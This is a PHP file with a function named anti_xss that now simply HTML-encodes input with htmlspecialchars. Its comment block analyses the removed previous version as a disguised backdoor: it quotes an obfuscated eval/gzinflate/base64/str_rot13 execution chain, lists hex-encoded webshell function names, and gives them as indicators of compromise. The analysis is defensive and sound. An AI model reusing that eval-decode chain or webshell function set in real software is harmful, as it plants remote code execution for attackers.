ANTI-XSS FILTER TO STOP XSS ATTACKS
<?php | |
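/**
 * Escape an untrusted string for safe inclusion in an HTML document.
 *
 * This replaces the previous body of the function, which filtered nothing and
 * should be read as hostile code rather than as the "WAF" its messages claimed:
 *
 *  - It ended with
 *    `eval(gzinflate(base64_decode(base64_decode(str_rot13($blacklisted_terms_encoded)))))`,
 *    i.e. it decoded and executed a hidden payload on every call. The encoded
 *    payload string is not present in this copy of the file.
 *  - It declared an array of hex strings that decode to PHP function names
 *    (php_uname, phpversion, chdir, getcwd, scandir, unlink, mkdir, chmod, rename,
 *    fopen/fwrite/fclose, file_get_contents, readfile, fileperms, assert, ...),
 *    plus a nested helper `x($c)` that called `$GNJ[24]($c)` -- index 24 of that
 *    list is `fileperms` -- and rendered the mode bits in `ls -l` style. `$GNJ` is
 *    never assigned in the visible code; presumably the eval'd payload populates
 *    it (unverified). That function set matches what a file-manager webshell needs.
 *  - The value it returned was made *less* safe, not more: `<script>` and then `<`
 *    were prepended to the output, and a character drawn with rand() from a list
 *    of HTML/shell metacharacters was spliced in at a random position, so the
 *    result was also non-deterministic.
 *  - Its "checks" were substring blocklists (`stripos` for `<`, `>`, `'`, `alert`)
 *    and trim() calls with tag names as the second argument; trim() takes a
 *    character list, so `trim($s, '<script>')` merely strips the letters
 *    s, c, r, i, p, t from the ends of the string. Blocklisting is not a
 *    substitute for output encoding in any case.
 *  - Everything else was arithmetic on unrelated or undefined variables
 *    ($o1, $f, $bachr), apparently padding, plus a session_start() side effect.
 *
 * If this code is found deployed, treat it as an indicator of compromise: hunt for
 * the eval/gzinflate/str_rot13 chain and the hex-encoded function-name list, not
 * for the "anti_xss" name it hides behind. The hosting page also flagged
 * bidirectional Unicode characters in the original file, which this copy does not
 * preserve, so a fetched original may carry text hidden from a casual read.
 *
 * The correct defence against reflected XSS is contextual output encoding, which
 * is all this function now does. It is for HTML text and attribute-value contexts
 * only; JavaScript, URL and CSS contexts need their own encoders.
 *
 * @param string|null $string Raw untrusted input, e.g. a query parameter; null
 *                            (a missing parameter) is treated as ''.
 * @return string The input with &, <, >, " and ' encoded as HTML entities.
 *                Invalid UTF-8 sequences are replaced (ENT_SUBSTITUTE) instead of
 *                turning the whole result into an empty string.
 */
function anti_xss(?string $string): string
{
    // Escape, do not block: every metacharacter is encoded, so nothing the caller
    // reflects can open a tag, an attribute or a quoted string.
    return htmlspecialchars($string ?? '', ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}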
echo(anti_xss($_GET['t'])); | |
?> | |